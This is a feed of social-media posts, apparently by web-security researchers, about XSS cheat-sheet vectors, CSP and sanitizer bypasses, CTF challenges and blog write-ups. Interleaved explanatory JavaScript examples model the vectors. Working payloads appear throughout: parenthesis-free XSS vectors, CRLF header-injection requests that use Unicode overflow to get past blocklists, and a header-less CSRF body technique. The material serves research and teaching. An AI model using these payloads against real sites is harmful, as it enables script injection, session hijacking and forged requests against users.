I'm happy to release a script gadgets wiki inspired by the work of @slekies, @kkotowicz, and @sirdarckcat in their Black Hat USA 2017 talk! 🔥
The goal is to provide quick access to gadgets that help bypass HTML sanitizers and CSPs 👇
gmsgadget.com
1/4
Posts by 0x999
New blog post is up: How I leaked the IP addresses of Brave's Tor window and Chrome VPN extension users--plus, a new Popunder technique and connect-src CSP directive bypass. Read more @ 0x999.net/blog/leaking...
<script> onpageswap=setTimeout; location='x'; Event.prototype.toString=EvalError.prototype.toString; Event.prototype.name='alert\x281\x29' </script>
Abuse EvalError, onpageswap, and setTimeout to get JS execution without parens.
@0x999.net redirects the page to trigger onpageswap, hijacks the thrown error, and turns it into code. Inspired by @terjanq.me. Now available on the XSS cheat sheet.
Link to vector👇
portswigger.net/web-security...
<img/src/onerror=window.onerror=eval;ReferenceError.prototype.name=';alert\x281\x29;var\x20Uncaught//';z>
This vector adds an onerror handler with eval, rewrites all ReferenceError names, then triggers an error to execute the payload. Just added it to the XSS cheat sheet. Credit to @0x999.net, inspired by @terjanq.me
portswigger.net/web-security...
ondevicemotion=setTimeout; Event.prototype.toString=URIError.prototype.toString; Event.prototype.message='alert\x281\x29'
Crafty JavaScript-context XSS vector using ondevicemotion, setTimeout, and URIError spoofing to trigger alert(1) now added to the XSS cheat sheet. By @0x999.net inspired by @terjanq.me
Link to vector👇
portswigger.net/web-security...
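The three vectors above share one trick: coerce an object the browser hands you (an Event, or the message of an uncaught error) into a string that is also valid JavaScript, then get the browser to evaluate that string. The following is an added example, not code from these posts or from the PortSwigger cheat sheet, that reproduces the string-building part in Node.js. Two browser behaviours that Node does not have are modelled as stated assumptions: (a) a browser's setTimeout coerces a non-function first argument to a string and evaluates it, and (b) window.onerror receives "Uncaught " + String(error) as its first argument. Node's global Event, Error.prototype.toString and indirect eval are the real thing; alert is a recording stub.

```javascript
// Added example (not from the posts above or the cheat sheet). Assumptions:
//   (a) browser setTimeout(nonFunction) stringifies the argument and evaluates it;
//   (b) window.onerror's first argument is "Uncaught " + String(error).
// Node >= 15 for the global Event constructor.

const alertCalls = [];                              // stand-in for alert(1)
globalThis.alert = (x) => { alertCalls.push(x); };
const globalEval = eval;                            // indirect eval: global scope, like the browser

// Error.prototype.toString returns `${name}: ${message}` and drops the separator when
// either side is empty. Borrowed onto Event.prototype, it turns every Event into a
// string of our choosing, because an event has no own name or message.
function eventStringWith(prop, value) {
  Event.prototype.toString = EvalError.prototype.toString; // same function as Error.prototype.toString
  Event.prototype[prop] = value;
  try {
    return String(new Event('pageswap'));           // what setTimeout(event) would evaluate, by (a)
  } finally {
    delete Event.prototype.toString;                 // restore inheritance from Object.prototype
    delete Event.prototype[prop];
  }
}

// onpageswap / ondevicemotion vectors: name-only yields 'alert(1)'; message-only
// yields 'Error: alert(1)', a labelled statement followed by the call. The \x28/\x29
// escapes keep literal parentheses out of the vector itself.
function eventGadgets() {
  return {
    viaName: eventStringWith('name', 'alert\x281\x29'),
    viaMessage: eventStringWith('message', 'alert\x281\x29'),
  };
}

// Step (a) modelled: evaluate the stringified event; returns how many alerts fired.
function modelSetTimeoutString(code) {
  const before = alertCalls.length;
  globalEval(code);
  return alertCalls.length - before;
}

// <img onerror> vector: window.onerror = eval, then rename every ReferenceError so the
// report "Uncaught <name>: z is not defined" is valid JS. `var Uncaught` hoists a
// declaration so the leading word does not itself throw, and `//` comments out the tail.
function referenceErrorGadget() {
  const savedName = ReferenceError.prototype.name;
  const before = alertCalls.length;
  const onerror = eval;                             // window.onerror = eval
  try {
    ReferenceError.prototype.name = ';alert\x281\x29;var\x20Uncaught//';
    let err;
    try { z; } catch (e) { err = e; }               // the bare `z` at the end of the vector
    const report = 'Uncaught ' + String(err);       // step (b) modelled
    onerror(report);                                 // indirect eval of the report
    return { report, alerts: alertCalls.length - before };
  } finally {
    ReferenceError.prototype.name = savedName;
  }
}
```

Running eventGadgets() gives 'alert(1)' and 'Error: alert(1)'; both evaluate cleanly, which is why the vectors need no parentheses or spaces of their own. referenceErrorGadget() returns the report string 'Uncaught ;alert(1);var Uncaught//: z is not defined' and records one alert.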
Unicode characters with a decomposition of 2+ ASCII characters that are registrable domains, by _0x999
shazzer.co.uk/vectors/681b...
This month, @0x999.net made an awesome and difficult Intigriti XSS challenge. I really enjoyed the openness of this challenge resulting in an unintended solution and the first solve 🩸!
Check out how I got there in my writeup below:
jorianwoltjer.com/blog/p/hacki...
Here is my author's writeup for Intigriti's March 0325 CTF challenge. Thanks to everyone who participated, and great job by all the solvers! 🔥
0x999.net/blog/intigri...
I made a little challenge for @intigriti.com
Goal: Steal the Bot's flag!⛳️
Try it out 👇
The Spanner is back! 🎉 I finally ditched WordPress for a custom blogging system. If you miss the golden era of web hacking, you’ll love revisiting classics like mXSS, DOM Clobbering, and RPO. Plus, plenty of quirky, vintage research gems.
thespanner.co.uk
Awesome!🔥
I'm very happy to finally share the second part of my DOMPurify security research 🔥
This article mostly focuses on DOMPurify misconfigurations, especially hooks, that downgrade the sanitizer's protection (even in the latest version)!
Link 👇
mizu.re/post/explori...
1/2
GET /%0D%0ASet-Cookie: foo=bar
403 Forbidden

GET /%E4%BC%8D%E4%BC%8ASet-Cookie: foo=bar
200 OK
Set-Cookie: foo=bar
Discover blocklist bypasses via unicode overflows using the latest updates to ActiveScan++, Hackvertor & Shazzer! Thanks to Ryan Barnett and Neh Patel for sharing this technique.
portswigger.net/research/byp...
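What the two requests above show is a blocklist inspecting the decoded string and a later layer squeezing each code point into a single byte, so that U+4F0D (伍) becomes 0x0D and U+4F0A (伊) becomes 0x0A. The following is an added example, not code from the post or from the tools it mentions, that models that pipeline in JavaScript; the lossy conversion is assumed to keep only the low 8 bits of each code point, and the blocklist is a deliberately naive CR/LF check.

```javascript
// Added example (not from the post or the tools it names). The "overflow" is modelled as
// codePoint & 0xFF, an assumed shape of the lossy code-point-to-byte conversion.

// Lossy conversion assumed to happen behind the blocklist.
function truncateToByte(s) {
  return Array.from(s, (ch) => String.fromCharCode(ch.codePointAt(0) & 0xff)).join('');
}

// Naive blocklist: reject CR/LF in the decoded path (the 403 in the post).
function blocklistAllows(decodedPath) {
  return !/[\r\n]/.test(decodedPath);
}

// Every BMP code point above 0xFF whose low byte is the wanted ASCII character.
// Lone surrogates are skipped because they cannot be UTF-8 encoded on their own.
function overflowAliases(asciiChar) {
  const low = asciiChar.charCodeAt(0);
  if (low > 0xff) throw new RangeError('need a single-byte character');
  const out = [];
  for (let cp = 0x100 + low; cp <= 0xffff; cp += 0x100) {
    if (cp >= 0xd800 && cp <= 0xdfff) continue;
    out.push(cp);
  }
  return out;
}

// Run a raw (percent-encoded) request path through blocklist, then lossy conversion.
function simulate(rawPath) {
  const decoded = decodeURIComponent(rawPath);
  if (!blocklistAllows(decoded)) return { status: 403, backendSees: null };
  return { status: 200, backendSees: truncateToByte(decoded) };
}

// Build the bypass path from the post: 伍伊 (U+4F0D U+4F0A) percent-encoded, then the
// injected header text appended as-is.
function craftCrlfPath(injected) {
  const crlf = String.fromCodePoint(0x4f0d, 0x4f0a);
  return '/' + encodeURIComponent(crlf) + injected;
}
```

simulate('/%0D%0ASet-Cookie: foo=bar') returns status 403, while simulate(craftCrlfPath('Set-Cookie: foo=bar')) passes the blocklist and hands the backend '/\r\nSet-Cookie: foo=bar'. overflowAliases('\r') lists every other candidate (0x010D, 0x020D, ... 0x4F0D, ...), which is the search space a fuzzer can sweep when a particular alias is itself blocked; the fix is to reject, not truncate, code points that do not fit the target encoding.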
My blog post, "Exploring Javascript Events & Bypassing WAFs via Character Normalization" has been nominated for the Top 10 Web Hacking Techniques of 2024!☺️
If you found it useful, I’d greatly appreciate your vote at the link below 👇
portswigger.net/polls/top-10...
Got sniped into the challenge and ended up doing some cool XSS research :D
11 char XSS with mind-boggling race-conditions.
TL;DR the final payload is location=x (10 chars) and the longest is top.Z.x=x.d (11 chars)
It's shorter than location=name !!
terjanq.me/solutions/jo...
Very cool technique by @nastystereo.com for POST-based CSRF without a Content-Type header using a Blob object. Interestingly, it also seems to work using a Uint8Array.
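The reason both a type-less Blob and a Uint8Array work is the Fetch "extract a body" rules: a string body gets text/plain;charset=UTF-8, URLSearchParams gets application/x-www-form-urlencoded;charset=UTF-8, a Blob gets its own type only if that type is non-empty, and a typed array gets nothing at all. The following is an added example, not code from the post, that inspects the header a browser would attach; it assumes Node 18 or later, whose built-in Request implements the same rules, and the target URL is a placeholder.

```javascript
// Added example (not from the post). Assumes Node >= 18 for the global Request, Blob and
// URLSearchParams; https://target.example/... is a placeholder, nothing is sent.

// Build the POST a cross-site page would send and report the Content-Type the Fetch
// body-extraction rules attached (null means the request carries no such header).
function bodyContentType(body) {
  const req = new Request('https://target.example/account/email', { method: 'POST', body });
  return req.headers.get('content-type');
}

// Side-by-side comparison of the candidate body types for the same form payload.
function compareBodies() {
  const rawForm = 'email=attacker%40example.com';
  return {
    string: bodyContentType(rawForm),
    urlSearchParams: bodyContentType(new URLSearchParams(rawForm)),
    typedBlob: bodyContentType(new Blob([rawForm], { type: 'application/json' })),
    untypedBlob: bodyContentType(new Blob([rawForm])),
    uint8Array: bodyContentType(new TextEncoder().encode(rawForm)),
  };
}

// Which of those bodies a CSRF page can use: no Content-Type at all means nothing
// for a server-side "must be application/x-www-form-urlencoded" check to match,
// and POST with no non-safelisted headers needs no CORS preflight.
function headerlessBodies() {
  return Object.entries(compareBodies())
    .filter(([, ct]) => ct === null)
    .map(([kind]) => kind);
}
```

compareBodies() returns null for untypedBlob and uint8Array and a concrete type for the other three, so headerlessBodies() is ['untypedBlob', 'uint8Array']. Whether the server then parses the body is up to its framework's handling of a missing Content-Type; the defence that does not depend on that is a CSRF token or SameSite cookies, not a Content-Type allowlist.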
I get a similar feeling sharing this here, since this is just my first blog post, but since part of it is inspired by your post, I hope it's ok :) 0x999.net/blog/explori...
To summarize what I have learned about Mutation XSS, my CVE, and the solution to my challenge, I wrote a post going through it all.
If you like regular XSS, this is a whole new world of crazy techniques and many sanitizer bypasses. You too can learn this!
jorianwoltjer.com/blog/p/hacki...
Here is the "writeup". Hope it's clear enough, otherwise ask in comments. Note that there are two paths that will result in XSS, and that the "error path" can be reached in numerous different ways, like alternatives 1 and 4.
Alternative 5 hits the "successful path" and can also be used in many ways
Very cool, thanks for sharing!
Just published a new blog post "Exploring Javascript events & Bypassing WAFs via character normalization", check it out: 0x999.net/blog/explori...
I'm guessing 2 and 5 since they won't be resolved as valid URLs?🤷♂️
We’re finally live! You can now watch “Listen to the whispers: web timing attacks that actually work” on YouTube: youtube.com/watch?v=zOPj...
Some cool new additions at CSPBypass.com by omidxrz
For example:
cspbypass.com#onetrust
<3
I made a little xss challenge based on an upcoming blogpost, if anyone wants to check it out:
xss.0x999.net
Goal:
1. Alert the flag
2. Execute arbitrary javascript
Hello World